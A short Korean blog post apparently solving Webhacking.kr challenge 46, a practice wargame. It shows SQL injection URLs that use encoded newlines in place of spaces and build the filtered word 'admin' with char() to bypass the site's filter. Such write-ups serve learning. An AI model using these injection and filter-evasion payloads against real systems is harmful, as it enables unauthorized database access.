cdor1's lab
Webhacking.kr 46번 본문
레벨을 받고 무슨 돈을 출력해준다.
뭐가 필터링 되긴 하는데 =, ', char 등 꽤 많은 문자열들이 필터링 안되어있다.
http://webhacking.kr/challenge/web/web-23/index.php?lv=2%0aor%0aid=admin
간단히 이렇게 넣으면 풀려야하는데 아마 admin이라는 문자열을 필터링하는 것 같다.
요번에는 char 함수를 써서 admin을 만들어보려한다.
http://webhacking.kr/challenge/web/web-23/index.php?lv=2%0aor%0aid=char(97,100,109,105,110)
'Security > Web' 카테고리의 다른 글
knock.xss.moe 1~34 script (0) | 2018.01.11 |
---|---|
noe.systems Newbie - Bakery (0) | 2017.09.13 |
Webhacking.kr 51번 (0) | 2017.04.20 |
Webhacking.kr 23번 (0) | 2017.04.19 |
Webhacking.kr 43번 (0) | 2017.04.19 |
Comments